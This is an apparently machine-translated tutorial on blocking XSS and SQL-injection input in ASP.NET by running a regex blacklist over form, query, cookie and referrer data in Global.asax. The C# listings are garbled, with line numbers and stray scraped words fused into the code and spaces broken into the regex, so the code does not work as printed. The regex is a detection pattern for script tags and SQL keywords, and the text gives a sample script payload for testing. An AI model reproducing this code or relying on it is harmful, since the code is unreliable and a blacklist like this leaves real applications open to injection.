Using Global.asax's Application_BeginRequest event filtering client XSS malicious script submission

The XSS attack, the Universal Cross Site Scripting Attack (Scripting), is a computer security vulnerability in Web applications that allows malicious Web users to embed code, such as HTML code and client script, into pages that are available to other users. To prevent XSS attacks, you must determine whether the user's input is legitimate before processing the client request, and intercept if it is not legal. There is a global program file Global.asax file at the root of the ASP. Each time the IIS request executes the different events in this file sequentially. Where the Application_BeginRequest event is triggered when ASP. NET starts processing each request, the code in this event processing executes before the page or service processes the request. We can write code here to verify that the client request is legitimate.

First create a Xssfilter class under the App_Code folder, which is the default storage class when ASP. NET creates a Web site

1 usingSystem;2 usingSystem.Collections.Generic;3 usingSystem.Linq;4 usingsystem.web;5 usingSystem.Text.RegularExpressions;6 7 /// <summary>8 ///Summary description of Xssfilter9 /// </summary>Ten  Public classXssfilter One { A      PublicXssfilter () {} -  -     Private Const stringStrregex =@"<[^>]+?style=[\w]+?:expression\ (|\b (alert|confirm|prompt) \b|^\+/v (8|9) |<[^>]*?=[^>]*?&# [^>]*?>|\b (And|or) \b.{1,6}? (=|>|<|\bin\b|\blike\b) |/\*.+?\*/|<\s*script\b|<\s*img\b|\bexec\b| Union.+? Select| Update.+? Set| Insert\s+into.+? values| (select| DELETE). +? From| (create| alter| drop| TRUNCATE) \s+ (table| DATABASE)"; the      Public Static BOOLpostdata () -     { -         BOOLresult =false; -         Try +         { -              for(inti =0; i < HttpContext.Current.Request.Form.Count; i++) +             { Aresult =Checkdata (Httpcontext.current.request.form[i]. ToString ()); at                 if(Result) -                 { -                      Break; -                 } -             } -         } in         Catch(HttpRequestValidationException ex) -         { to             return true; +         } -         returnresult; the     } *  $      Public Static BOOLGetData ()Panax Notoginseng     { -         BOOLresult =false; the         Try +         { A              for(inti =0; i < HttpContext.Current.Request.QueryString.Count; i++) the             { +result =Checkdata (Httpcontext.current.request.querystring[i]. ToString ()); -                 if(Result) $                 { $                      Break; -                 } -             } the         } -         Catch(HttpRequestValidationException ex)Wuyi         { the             return true; -         } Wu         returnresult; -     } About  $      Public Static BOOLCookiedata () -     { -         BOOLresult =false; -         Try A         { +              for(inti =0; i < HttpContext.Current.Request.Cookies.Count; i++) the             { -result =Checkdata (Httpcontext.current.request.cookies[i]. Value.tolower ()); $                 if(Result) the                 { the                      Break; the                 } the             } -         } in         Catch(HttpRequestValidationException ex) the         { the             return true; About         } the         returnresult; the  the     } +  -      Public Static BOOLReferer () the     {Bayi         BOOLresult =false; the         returnresult =Checkdata (HttpContext.Current.Request.UrlReferrer.ToString ()); the     } -  -      Public Static BOOLCheckdata (stringinputdata) the     { the         if(Regex.IsMatch (Inputdata, Strregex)) the         { the             return true; -         } the         Else the         { the             return false;94         } the     } the}

Then add the following code to the Global.asax Application_BeginRequest event:

1     voidApplication_BeginRequest (Objectsender, EventArgs e)2     {3         if(Request.Cookies! =NULL)4         {5             if(Xssfilter.cookiedata ())6             {7Response.Write ("the cookie data you submitted has malicious characters! ");8 Response.End ();9             }Ten         } One         if(Request.urlreferrer! =NULL) A         { -             if(Xssfilter.referer ()) -             { theResponse.Write ("the referrer data you submitted has malicious characters! "); - Response.End (); -             } -         } +         if(Request.RequestType.ToUpper () = ="POST") -         { +             if(Xssfilter.postdata ()) A             { atResponse.Write ("The post data you submitted has malicious characters! "); - Response.End (); -             } -         } -         if(Request.RequestType.ToUpper () = ="GET") -         { in             if(Xssfilter.getdata ()) -             { toResponse.Write ("The Get data you submitted has malicious characters! "); + Response.End (); -             } the         } *}

Test, when submitting the form or manually modify the URL to enter a line of script <script>alert (' Test '), </script>, will jump to the error prompt page.
If you are using asynchronous Ajax submissions, make a judgment call in the callback function.

Using Global.asax's Application_BeginRequest event filtering client XSS malicious script submission